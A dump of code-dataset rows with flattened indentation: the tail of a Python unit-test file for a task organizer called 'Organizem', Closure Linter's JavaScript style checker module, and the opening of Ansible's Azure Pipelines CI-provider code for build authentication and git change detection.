        # Test case of single-value passed to find_items() for an
# element that is stored in item as a list (tags)
action1 = 'action 1010'
action1_rgx = 'action 101*'
actions1 = [action1]
item1 = Item(title, {Elem.ACTIONS : actions1})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
self.assertTrue(orgm.find_items(Elem.ACTIONS, action1_rgx, use_regex_match=True))
        # Test case of multi-value list passed to find_items() for an
# element that is stored in item as a list (tags)
action2 = 'action 1020'
action2_rgx = 'action 102*'
actions2 = [action1, action2]
item2 = Item(title, {Elem.ACTIONS : actions2})
orgm.add_item(item2)
self.assertTrue(orgm.find_items(Elem.ACTIONS, action2_rgx, use_regex_match=True))
def test_add_item__find_items_by_priority(self):
self._init_test_data_file()
title = "title"
priority = "P1"
item = Item(title, {Elem.PRIORITY : priority})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item)
self.assertTrue(orgm.find_items(Elem.PRIORITY, priority))
def test_add_item__find_rgx_items_by_priority(self):
self._init_test_data_file()
title = "title"
priority = "P1"
rgx_match = "P*"
item = Item(title, {Elem.PRIORITY : priority})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item)
self.assertTrue(orgm.find_items(Elem.PRIORITY, rgx_match, use_regex_match=True))
def test_add_item__find_items_by_note(self):
self._init_test_data_file()
title = "title"
note = """* Support for reporting on metadata
** all titles (alpha order, due date order)
** all projects (alpha order)
** all areas (alpha order)
** all tags (alpha order)
** all actions (grouped by item, item next due date order)
http://www.snippy.com
ljalj;
a dafs asdfdsa wkwjl;qq;q;"""
item = Item(title, {Elem.NOTE : note})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item)
self.assertTrue(orgm.find_items(Elem.NOTE, note))
def test_add_item__find_rgx_items_by_note(self):
self._init_test_data_file()
title = "title"
note = """* Support for reporting on metadata
** all titles (alpha order, due date order)
** all projects (alpha order)
** all areas (alpha order)
** all tags (alpha order)
** all actions (grouped by item, item next due date order)
http://www.snippy.com
ljalj;
a dafs asdfdsa wkwjl;qq;q;"""
note_rgx = "\* Support for reporting *"
item = Item(title, {Elem.NOTE : note})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item)
self.assertTrue(orgm.find_items(Elem.NOTE, note_rgx, use_regex_match=True))
def test_remove_items_rgx_by_title(self):
self._init_test_data_file()
title = "title"
rgx_match = "titl*"
item = Item(title)
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item)
self.assertTrue(orgm.find_items(Elem.TITLE, rgx_match, use_regex_match=True))
# NOTE: Now remove the item and check that it's not there any more
orgm.remove_items(Elem.TITLE, rgx_match, use_regex_match=True)
self.assertFalse(orgm.find_items(Elem.TITLE, rgx_match, use_regex_match=True))
def test_remove_items_rgx_by_area(self):
self._init_test_data_file()
title = "title"
area = "area"
rgx_match = "are*"
item = Item(title, {Elem.AREA : area})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item)
self.assertTrue(orgm.find_items(Elem.AREA, rgx_match, use_regex_match=True))
orgm.remove_items(Elem.AREA, rgx_match, use_regex_match=True)
self.assertFalse(orgm.find_items(Elem.AREA, rgx_match, use_regex_match=True))
def test_remove_items_by_project(self):
self._init_test_data_file()
title = "title"
project = "project"
item = Item(title, {Elem.PROJECT : project})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item)
self.assertTrue(orgm.find_items(Elem.PROJECT, project))
orgm.remove_items(Elem.PROJECT, project)
self.assertFalse(orgm.find_items(Elem.PROJECT, project))
def test_remove_items_by_tags(self):
self._init_test_data_file()
title = "title"
tag1 = 'tag 1'
tags1 = [tag1]
item1 = Item(title, {Elem.TAGS : tags1})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
self.assertTrue(orgm.find_items(Elem.TAGS, tag1))
orgm.remove_items(Elem.TAGS, tag1)
self.assertFalse(orgm.find_items(Elem.TAGS, tag1))
tag2 = 'tag 2'
tags2 = [tag1, tag2]
item2 = Item(title, {Elem.TAGS : tags2})
orgm.add_item(item2)
self.assertTrue(orgm.find_items(Elem.TAGS, tag2))
self.assertTrue(orgm.find_items(Elem.TAGS, tags2))
orgm.remove_items(Elem.TAGS, tags2)
self.assertFalse(orgm.find_items(Elem.TAGS, tags2))
def test_remove_items_rgx_by_actions(self):
self._init_test_data_file()
title = "title"
action1 = 'action 110'
rgx_match = "action 11*"
actions1 = [action1]
item1 = Item(title, {Elem.ACTIONS : actions1})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
self.assertTrue(orgm.find_items(Elem.ACTIONS, action1))
orgm.remove_items(Elem.ACTIONS, rgx_match, use_regex_match=True)
self.assertFalse(orgm.find_items(Elem.ACTIONS, action1))
action2 = 'action 101'
rgx_match = "action 10*"
actions2 = [action1, action2]
item2 = Item(title, {Elem.ACTIONS : actions2})
orgm.add_item(item2)
self.assertTrue(orgm.find_items(Elem.ACTIONS, action2))
self.assertTrue(orgm.find_items(Elem.ACTIONS, actions2))
orgm.remove_items(Elem.ACTIONS, rgx_match, use_regex_match=True)
self.assertFalse(orgm.find_items(Elem.ACTIONS, actions2))
def test_remove_items_by_note(self):
self._init_test_data_file()
title = "title"
note = """* Support for reporting on metadata
** all titles (alpha order, due date order)
** all projects (alpha order)
** all areas (alpha order)
** all tags (alpha order)
** all actions (grouped by item, item next due date order)
http://www.snippy.com
ljalj;
a dafs asdfdsa wkwjl;qq;q;"""
item = Item(title, {Elem.NOTE : note})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item)
self.assertTrue(orgm.find_items(Elem.NOTE, note))
orgm.remove_items(Elem.NOTE, note)
self.assertFalse(orgm.find_items(Elem.NOTE, note))
def test_remove_items_rgx_by_note(self):
self._init_test_data_file()
title = "title"
note = """* Support for reporting on metadata
** all titles (alpha order, due date order)
** all projects (alpha order)
** all areas (alpha order)
** all tags (alpha order)
** all actions (grouped by item, item next due date order)
http://www.snippy.com
ljalj;
a dafs asdfdsa wkwjl;qq;q;"""
note_rgx = "\* Support for reporting *"
item = Item(title, {Elem.NOTE : note})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item)
self.assertTrue(orgm.find_items(Elem.NOTE, note_rgx, use_regex_match=True))
orgm.remove_items(Elem.NOTE, note_rgx, use_regex_match=True)
self.assertFalse(orgm.find_items(Elem.NOTE, note_rgx))
def test_get_all_titles(self):
self._init_test_data_file()
title1 = 'title 1'
title2 = 'title 2'
item1 = Item(title1)
item2 = Item(title2)
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
orgm.add_item(item2)
# Have to handle the fact that init of test dat file includes dummy item with "TEST_ITEM" title
self.assertTrue(orgm.get_elements(Elem.TITLE) == ['TEST_ITEM', 'title 1', 'title 2'])
def test_get_all_projects(self):
self._init_test_data_file()
title1 = 'title 1'
title2 = 'title 2'
project1 = 'project 1'
project2 = 'project 2'
item1 = Item(title1, {Elem.PROJECT : project1})
item2 = Item(title2, {Elem.PROJECT : project2})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
orgm.add_item(item2)
expected = ["''", 'project 1', 'project 2']
actual = orgm.get_elements(Elem.PROJECT)
# Have to handle the fact that init of test dat file includes dummy item with empty name
self.assertTrue(expected == actual)
def test_get_all_areas(self):
self._init_test_data_file()
title1 = 'title 1'
title2 = 'title 2'
area1 = 'area 1'
area2 = 'area 2'
item1 = Item(title1, {Elem.AREA : area1})
item2 = Item(title2, {Elem.AREA : area2})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
orgm.add_item(item2)
expected = ["''", 'area 1', 'area 2']
actual = orgm.get_elements(Elem.AREA)
# Have to handle the fact that init of test dat file includes dummy item with empty name
self.assertTrue(expected == actual)
def test_get_all_tags(self):
self._init_test_data_file()
title1 = 'title 1'
title2 = 'title 2'
tags1 = ['tag 1', 'tag 2']
tags2 = ['tag 3', 'tag 4']
item1 = Item(title1, {Elem.TAGS : tags1})
item2 = Item(title2, {Elem.TAGS : tags2})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
orgm.add_item(item2)
expected = ['tag 1', 'tag 2', 'tag 3', 'tag 4']
actual = orgm.get_elements(Elem.TAGS)
# Have to handle the fact that init of test dat file includes dummy item with empty name
self.assertTrue(expected == actual)
def test_get_all_actions(self):
self._init_test_data_file()
title1 = 'title 1'
title2 = 'title 2'
actions1 = ['action 1', 'action 2']
actions2 = ['action 3', 'action 4']
item1 = Item(title1, {Elem.ACTIONS : actions1})
item2 = Item(title2, {Elem.ACTIONS : actions2})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
orgm.add_item(item2)
expected = ['action 1', 'action 2', 'action 3', 'action 4']
actual = orgm.get_elements(Elem.ACTIONS)
# Have to handle the fact that init of test dat file includes dummy item with empty name
self.assertTrue(expected == actual)
def test_get_grouped_items_project(self):
self._init_test_data_file()
title1 = 'title 1'
title2 = 'title 2'
title3 = 'title 3'
title4 = 'title 4'
project1 = 'project 1'
project2 = 'project 2'
item1 = Item(title1, {Elem.PROJECT : project1})
item2 = Item(title2, {Elem.PROJECT : project2})
item3 = Item(title3, {Elem.PROJECT : project1})
item4 = Item(title4, {Elem.PROJECT : project2})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
orgm.add_item(item2)
orgm.add_item(item3)
orgm.add_item(item4)
expected1 = repr([{'item' : [{'title': 'title 1'}, {'area': "''"}, {'project': 'project 1'}, {'tags': []}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}, {'item' : [{'title': 'title 3'}, {'area': "''"}, {'project': 'project 1'}, {'tags': []}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}])
expected2 = repr([{'item' : [{'title': 'title 2'}, {'area': "''"}, {'project': 'project 2'}, {'tags': []}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}, {'item' : [{'title': 'title 4'}, {'area': "''"}, {'project': 'project 2'}, {'tags': []}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}])
actual = orgm.get_grouped_items(Elem.PROJECT)
actual1 = repr(actual[project1])
actual2 = repr(actual[project2])
self.assertTrue(expected1 == actual1)
self.assertTrue(expected2 == actual2)
def test_get_grouped_items_area(self):
self._init_test_data_file()
title1 = 'title 1'
title2 = 'title 2'
title3 = 'title 3'
title4 = 'title 4'
area1 = 'area 1'
area2 = 'area 2'
item1 = Item(title1, {Elem.AREA : area1})
item2 = Item(title2, {Elem.AREA : area2})
item3 = Item(title3, {Elem.AREA : area1})
item4 = Item(title4, {Elem.AREA : area2})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
orgm.add_item(item2)
orgm.add_item(item3)
orgm.add_item(item4)
expected1 = repr([{'item' : [{'title': 'title 1'}, {'area': 'area 1'}, {'project': "''"}, {'tags': []}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}, {'item' : [{'title': 'title 3'}, {'area': 'area 1'}, {'project': "''"}, {'tags': []}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}])
expected2 = repr([{'item' : [{'title': 'title 2'}, {'area': 'area 2'}, {'project': "''"}, {'tags': []}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}, {'item' : [{'title': 'title 4'}, {'area': 'area 2'}, {'project': "''"}, {'tags': []}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}])
actual = orgm.get_grouped_items(Elem.AREA)
actual1 = repr(actual[area1])
actual2 = repr(actual[area2])
self.assertTrue(expected1 == actual1)
self.assertTrue(expected2 == actual2)
def test_get_grouped_items_tags(self):
self._init_test_data_file()
title1 = 'title 1'
title2 = 'title 2'
title3 = 'title 3'
title4 = 'title 4'
tag1 = 'tag 1'
tag2 = 'tag 2'
tag3 = 'tag 3'
tag4 = 'tag 4'
tags1 = [tag1, tag2]
tags2 = [tag3, tag4]
item1 = Item(title1, {Elem.TAGS : tags1})
item2 = Item(title2, {Elem.TAGS : tags2})
item3 = Item(title3, {Elem.TAGS : tags1})
item4 = Item(title4, {Elem.TAGS : tags2})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
orgm.add_item(item2)
orgm.add_item(item3)
orgm.add_item(item4)
expected1 = repr([{'item' : [{'title': 'title 1'}, {'area': "''"}, {'project': "''"}, {'tags': [tag1, tag2]}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}, \
{'item' : [{'title': 'title 3'}, {'area': "''"}, {'project': "''"}, {'tags': [tag1, tag2]}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}])
expected2 = repr([{'item' : [{'title': 'title 1'}, {'area': "''"}, {'project': "''"}, {'tags': [tag1, tag2]}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}, \
{'item' : [{'title': 'title 3'}, {'area': "''"}, {'project': "''"}, {'tags': [tag1, tag2]}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}])
expected3 = repr([{'item' : [{'title': 'title 2'}, {'area': "''"}, {'project': "''"}, {'tags': [tag3, tag4]}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}, \
{'item' : [{'title': 'title 4'}, {'area': "''"}, {'project': "''"}, {'tags': [tag3, tag4]}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}])
expected4 = repr([{'item' : [{'title': 'title 2'}, {'area': "''"}, {'project': "''"}, {'tags': [tag3, tag4]}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}, \
{'item' : [{'title': 'title 4'}, {'area': "''"}, {'project': "''"}, {'tags': [tag3, tag4]}, {'actions': []},{'priority': "''"}, {'due_date': "''"}, {'note': ''}]}])
actual = orgm.get_grouped_items(Elem.TAGS)
actual1 = repr(actual[tag1])
actual2 = repr(actual[tag2])
actual3 = repr(actual[tag3])
actual4 = repr(actual[tag4])
self.assertTrue(expected1 == actual1)
self.assertTrue(expected2 == actual2)
self.assertTrue(expected3 == actual3)
self.assertTrue(expected4 == actual4)
def test_regroup_data_file_project(self):
self._init_test_data_file()
title1 = 'title 1'
title2 = 'title 2'
title3 = 'title 3'
title4 = 'title 4'
project1 = 'project 1'
project2 = 'project 2'
item1 = Item(title1, {Elem.PROJECT : project1})
item2 = Item(title2, {Elem.PROJECT : project2})
item3 = Item(title3, {Elem.PROJECT : project1})
item4 = Item(title4, {Elem.PROJECT : project2})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
orgm.add_item(item2)
orgm.add_item(item3)
orgm.add_item(item4)
grouped_items = orgm.get_grouped_items(Elem.PROJECT)
new_data_file_str = orgm.regroup_data_file(Elem.PROJECT, ActionArg.ASCENDING, with_group_labels=False)
grouped_items_str = []
for group_key in grouped_items.keys():
for item in grouped_items[group_key]:
grouped_items_str.append(str(item))
grouped_items_str = "\n".join(grouped_items_str)
self.assertTrue(grouped_items_str == new_data_file_str)
def test_regroup_data_file_area(self):
self._init_test_data_file()
title1 = 'title 1'
title2 = 'title 2'
title3 = 'title 3'
title4 = 'title 4'
area1 = 'area 1'
area2 = 'area 2'
item1 = Item(title1, {Elem.AREA : area1})
item2 = Item(title2, {Elem.AREA : area2})
item3 = Item(title3, {Elem.AREA : area1})
item4 = Item(title4, {Elem.AREA : area2})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
orgm.add_item(item2)
orgm.add_item(item3)
orgm.add_item(item4)
grouped_items = orgm.get_grouped_items(Elem.AREA)
new_data_file_str = orgm.regroup_data_file(Elem.AREA, ActionArg.ASCENDING, with_group_labels=False)
grouped_items_str = []
for group_key in grouped_items.keys():
for item in grouped_items[group_key]:
grouped_items_str.append(str(item))
grouped_items_str = "\n".join(grouped_items_str)
self.assertTrue(grouped_items_str == new_data_file_str)
def test_regroup_data_file_area_sort_desc(self):
self._init_test_data_file()
title1 = 'title 1'
title2 = 'title 2'
title3 = 'title 3'
title4 = 'title 4'
area1 = 'area 1'
area2 = 'area 2'
item1 = Item(title1, {Elem.AREA : area1})
item2 = Item(title2, {Elem.AREA : area2})
item3 = Item(title3, {Elem.AREA : area1})
item4 = Item(title4, {Elem.AREA : area2})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
orgm.add_item(item2)
orgm.add_item(item3)
orgm.add_item(item4)
grouped_items = orgm.get_grouped_items(Elem.AREA)
new_data_file_str = orgm.regroup_data_file(Elem.AREA, ActionArg.DESCENDING, with_group_labels=False)
grouped_items_str = []
group_keys = grouped_items.keys()
group_keys.reverse()
for group_key in group_keys:
for item in grouped_items[group_key]:
grouped_items_str.append(str(item))
grouped_items_str = "\n".join(grouped_items_str)
self.assertTrue(grouped_items_str == new_data_file_str)
def test_regroup_data_file_tags(self):
self._init_test_data_file()
title1 = 'title 1'
title2 = 'title 2'
title3 = 'title 3'
title4 = 'title 4'
tag1 = 'tag 1'
tag2 = 'tag 2'
tag3 = 'tag 3'
tag4 = 'tag 4'
tags1 = [tag1, tag2]
tags2 = [tag3, tag4]
item1 = Item(title1, {Elem.TAGS : tags1})
item2 = Item(title2, {Elem.TAGS : tags2})
item3 = Item(title3, {Elem.TAGS : tags1})
item4 = Item(title4, {Elem.TAGS : tags2})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
orgm.add_item(item2)
orgm.add_item(item3)
orgm.add_item(item4)
grouped_items = orgm.get_grouped_items(Elem.TAGS)
new_data_file_str = orgm.regroup_data_file(Elem.TAGS, ActionArg.ASCENDING, with_group_labels=False)
grouped_items_str = []
for group_key in grouped_items.keys():
for item in grouped_items[group_key]:
grouped_items_str.append(str(item))
grouped_items_str = "\n".join(grouped_items_str)
self.assertTrue(grouped_items_str == new_data_file_str)
def test_regroup_data_file_tags_sort_desc(self):
self._init_test_data_file()
title1 = 'title 1'
title2 = 'title 2'
title3 = 'title 3'
title4 = 'title 4'
tag1 = 'tag 1'
tag2 = 'tag 2'
tag3 = 'tag 3'
tag4 = 'tag 4'
tags1 = [tag1, tag2]
tags2 = [tag3, tag4]
item1 = Item(title1, {Elem.TAGS : tags1})
item2 = Item(title2, {Elem.TAGS : tags2})
item3 = Item(title3, {Elem.TAGS : tags1})
item4 = Item(title4, {Elem.TAGS : tags2})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
orgm.add_item(item2)
orgm.add_item(item3)
orgm.add_item(item4)
grouped_items = orgm.get_grouped_items(Elem.TAGS)
new_data_file_str = orgm.regroup_data_file(Elem.TAGS, ActionArg.DESCENDING, with_group_labels=False)
grouped_items_str = []
group_keys = grouped_items.keys()
group_keys.reverse()
for group_key in group_keys:
for item in grouped_items[group_key]:
grouped_items_str.append(str(item))
grouped_items_str = "\n".join(grouped_items_str)
self.assertTrue(grouped_items_str == new_data_file_str)
def test_backup(self):
self._init_test_data_file()
title1 = 'title 1'
title2 = 'title 2'
title3 = 'title 3'
title4 = 'title 4'
tag1 = 'tag 1'
tag2 = 'tag 2'
tag3 = 'tag 3'
tag4 = 'tag 4'
tags1 = [tag1, tag2]
tags2 = [tag3, tag4]
item1 = Item(title1, {Elem.TAGS : tags1})
item2 = Item(title2, {Elem.TAGS : tags2})
item3 = Item(title3, {Elem.TAGS : tags1})
item4 = Item(title4, {Elem.TAGS : tags2})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
orgm.add_item(item2)
orgm.add_item(item3)
orgm.add_item(item4)
bak_data_file = 'orgm_test.dat_bak'
orgm.backup(bak_data_file)
import filecmp
        self.assertTrue(filecmp.cmp(TEST_DATA_FILE, bak_data_file))
    # NOTE: This is a manual test, no assert(). User must look at TEST_DATA_FILE
# and confirm there is a new empty item
def test_add_empty(self):
self._init_test_data_file()
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_empty()
#def test_add_item__find_item_by_title__cli(self):
# self._init_test_data_file()
# orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
# title = 'my item title'
# cmd = ['-- add', '--title', title]
# orgm.run_shell_cmd(cmd)
# self.assertTrue(orgm.find_items(Elem.TITLE, title))
if __name__ == '__main__':
unittest.main() |
hujiajie/chromium-crosswalk | refs/heads/master | third_party/closure_linter/closure_linter/checker.py | 109 | #!/usr/bin/env python
#
# Copyright 2007 The Closure Linter Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Core methods for checking JS files for common style guide violations."""
__author__ = ('[email protected] (Robert Walker)',
'[email protected] (Andy Perelson)')
import gflags as flags
from closure_linter import aliaspass
from closure_linter import checkerbase
from closure_linter import closurizednamespacesinfo
from closure_linter import javascriptlintrules
flags.DEFINE_list('closurized_namespaces', '',
                  'Namespace prefixes, used for testing of '
'goog.provide/require')
flags.DEFINE_list('ignored_extra_namespaces', '',
                  'Fully qualified namespaces that should not be reported '
'as extra by the linter.')
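# Illustration only (assumed typical invocation, not part of this module): these flags are
# normally supplied on the linter command line, for example:
#   gjslint --closurized_namespaces=goog,myproject --ignored_extra_namespaces=goog.testing foo.js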
class JavaScriptStyleChecker(checkerbase.CheckerBase):
"""Checker that applies JavaScriptLintRules."""
def __init__(self, state_tracker, error_handler):
"""Initialize an JavaScriptStyleChecker object.
Args:
state_tracker: State tracker.
error_handler: Error handler to pass all errors to.
"""
self._namespaces_info = None
self._alias_pass = None
if flags.FLAGS.closurized_namespaces:
self._namespaces_info = (
closurizednamespacesinfo.ClosurizedNamespacesInfo(
flags.FLAGS.closurized_namespaces,
flags.FLAGS.ignored_extra_namespaces))
self._alias_pass = aliaspass.AliasPass(
flags.FLAGS.closurized_namespaces, error_handler)
checkerbase.CheckerBase.__init__(
self,
error_handler=error_handler,
lint_rules=javascriptlintrules.JavaScriptLintRules(
self._namespaces_info),
state_tracker=state_tracker)
def Check(self, start_token, limited_doc_checks=False, is_html=False,
stop_token=None):
"""Checks a token stream for lint warnings/errors.
Adds a separate pass for computing dependency information based on
goog.require and goog.provide statements prior to the main linting pass.
Args:
start_token: The first token in the token stream.
limited_doc_checks: Whether to perform limited checks.
is_html: Whether this token stream is HTML.
stop_token: If given, checks should stop at this token.
"""
self._lint_rules.Initialize(self, limited_doc_checks, is_html)
if self._alias_pass:
self._alias_pass.Process(start_token)
    # To maximize the number of errors that get reported before a parse error
    # is displayed, don't run the dependency pass if a parse error exists.
if self._namespaces_info:
self._namespaces_info.Reset()
self._ExecutePass(start_token, self._DependencyPass, stop_token)
self._ExecutePass(start_token, self._LintPass, stop_token)
# If we have a stop_token, we didn't end up reading the whole file and,
# thus, don't call Finalize to do end-of-file checks.
if not stop_token:
self._lint_rules.Finalize(self._state_tracker)
def _DependencyPass(self, token):
"""Processes an individual token for dependency information.
Used to encapsulate the logic needed to process an individual token so that
it can be passed to _ExecutePass.
Args:
token: The token to process.
"""
self._namespaces_info.ProcessToken(token, self._state_tracker)
|
sivel/ansible | refs/heads/devel | test/lib/ansible_test/_internal/ci/azp.py | 14 | """Support code for working with Azure Pipelines."""
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import tempfile
import uuid
from .. import types as t
from ..encoding import (
to_bytes,
)
from ..config import (
CommonConfig,
TestConfig,
)
from ..git import (
Git,
)
from ..http import (
HttpClient,
urlencode,
)
from ..util import (
display,
MissingEnvironmentVariable,
)
from . import (
AuthContext,
ChangeDetectionNotSupported,
CIProvider,
CryptographyAuthHelper,
)
CODE = 'azp'
class AzurePipelines(CIProvider):
"""CI provider implementation for Azure Pipelines."""
def __init__(self):
self.auth = AzurePipelinesAuthHelper()
@staticmethod
def is_supported(): # type: () -> bool
"""Return True if this provider is supported in the current running environment."""
return os.environ.get('SYSTEM_COLLECTIONURI', '').startswith('https://dev.azure.com/')
@property
def code(self): # type: () -> str
"""Return a unique code representing this provider."""
return CODE
@property
def name(self): # type: () -> str
"""Return descriptive name for this provider."""
return 'Azure Pipelines'
def generate_resource_prefix(self): # type: () -> str
"""Return a resource prefix specific to this CI provider."""
try:
prefix = 'azp-%s-%s-%s' % (
os.environ['BUILD_BUILDID'],
os.environ['SYSTEM_JOBATTEMPT'],
os.environ['SYSTEM_JOBIDENTIFIER'],
)
except KeyError as ex:
raise MissingEnvironmentVariable(name=ex.args[0])
return prefix
def get_base_branch(self): # type: () -> str
"""Return the base branch or an empty string."""
base_branch = os.environ.get('SYSTEM_PULLREQUEST_TARGETBRANCH') or os.environ.get('BUILD_SOURCEBRANCHNAME')
if base_branch:
base_branch = 'origin/%s' % base_branch
return base_branch or ''
def detect_changes(self, args): # type: (TestConfig) -> t.Optional[t.List[str]]
"""Initialize change detection."""
result = AzurePipelinesChanges(args)
if result.is_pr:
job_type = 'pull request'
else:
job_type = 'merge commit'
display.info('Processing %s for branch %s commit %s' % (job_type, result.branch, result.commit))
if not args.metadata.changes:
args.metadata.populate_changes(result.diff)
if result.paths is None:
# There are several likely causes of this:
# - First run on a new branch.
# - Too many pull requests passed since the last merge run passed.
display.warning('No successful commit found. All tests will be executed.')
return result.paths
def supports_core_ci_auth(self, context): # type: (AuthContext) -> bool
"""Return True if Ansible Core CI is supported."""
return True
def prepare_core_ci_auth(self, context): # type: (AuthContext) -> t.Dict[str, t.Any]
"""Return authentication details for Ansible Core CI."""
try:
request = dict(
org_name=os.environ['SYSTEM_COLLECTIONURI'].strip('/').split('/')[-1],
project_name=os.environ['SYSTEM_TEAMPROJECT'],
build_id=int(os.environ['BUILD_BUILDID']),
task_id=str(uuid.UUID(os.environ['SYSTEM_TASKINSTANCEID'])),
)
except KeyError as ex:
raise MissingEnvironmentVariable(name=ex.args[0])
self.auth.sign_request(request)
auth = dict(
azp=request,
)
return auth
def get_git_details(self, args): # type: (CommonConfig) -> t.Optional[t.Dict[str, t.Any]]
"""Return details about git in the current environment."""
changes = AzurePipelinesChanges(args)
details = dict(
base_commit=changes.base_commit,
commit=changes.commit,
)
return details
class AzurePipelinesAuthHelper(CryptographyAuthHelper):
"""
Authentication helper for Azure Pipelines.
Based on cryptography since it is provided by the default Azure Pipelines environment.
"""
def publish_public_key(self, public_key_pem): # type: (str) -> None
"""Publish the given public key."""
try:
agent_temp_directory = os.environ['AGENT_TEMPDIRECTORY']
except KeyError as ex:
raise MissingEnvironmentVariable(name=ex.args[0])
# the temporary file cannot be deleted because we do not know when the agent has processed it
# placing the file in the agent's temp directory allows it to be picked up when the job is running in a container
with tempfile.NamedTemporaryFile(prefix='public-key-', suffix='.pem', delete=False, dir=agent_temp_directory) as public_key_file:
public_key_file.write(to_bytes(public_key_pem))
public_key_file.flush()
# make the agent aware of the public key by declaring it as an attachment
vso_add_attachment('ansible-core-ci', 'public-key.pem', public_key_file.name)
class AzurePipelinesChanges:
"""Change information for an Azure Pipelines build."""
def __init__(self, args): # type: (CommonConfig) -> None
self.args = args
self.git = Git()
try:
self.org_uri = os.environ['SYSTEM_COLLECTIONURI'] # ex: https://dev.azure.com/{org}/
self.project = os.environ['SYSTEM_TEAMPROJECT']
self.repo_type = os.environ['BUILD_REPOSITORY_PROVIDER'] # ex: GitHub
self.source_branch = os.environ['BUILD_SOURCEBRANCH']
self.source_branch_name = os.environ['BUILD_SOURCEBRANCHNAME']
self.pr_branch_name = os.environ.get('SYSTEM_PULLREQUEST_TARGETBRANCH')
except KeyError as ex:
raise MissingEnvironmentVariable(name=ex.args[0])
if self.source_branch.startswith('refs/tags/'):
raise ChangeDetectionNotSupported('Change detection is not supported for tags.')
self.org = self.org_uri.strip('/').split('/')[-1]
self.is_pr = self.pr_branch_name is not None
if self.is_pr:
# HEAD is a merge commit of the PR branch into the target branch
# HEAD^1 is HEAD of the target branch (first parent of merge commit)
# HEAD^2 is HEAD of the PR branch (second parent of merge commit)
# see: https://git-scm.com/docs/gitrevisions
self.branch = self.pr_branch_name
self.base_commit = 'HEAD^1'
self.commit = 'HEAD^2'
else:
commits = self.get_successful_merge_run_commits()
self.branch = self.source_branch_name
self.base_commit = self.get_last_successful_commit(commits)
self.commit = 'HEAD'
self.commit = self.git.run_git(['rev-parse', self.commit]).strip()
if self.base_commit:
self.base_commit = self.git.run_git(['rev-parse', self.base_commit]).strip()
# <commit>...<commit>
# This form is to view the changes on the branch containing and up to the second <commit>, starting at a common ancestor of both <commit>.
# see: https://git-scm.com/docs/git-diff
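            # For illustration, the dot_range built below corresponds to running something like
            #   git diff --name-only <base_commit>...<commit>
            # which lists only the paths changed on this branch since the common ancestor.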
dot_range = '%s...%s' % (self.base_commit, self.commit)
self.paths = sorted(self.git.get_diff_names([dot_range]))
self.diff = self.git.get_diff([dot_range])
else:
self.paths = None # act as though change detection not enabled, do not filter targets
self.diff = []
def get_successful_merge_run_commits(self): # type: () -> t.Set[str]
"""Return a set of recent successsful merge commits from Azure Pipelines."""
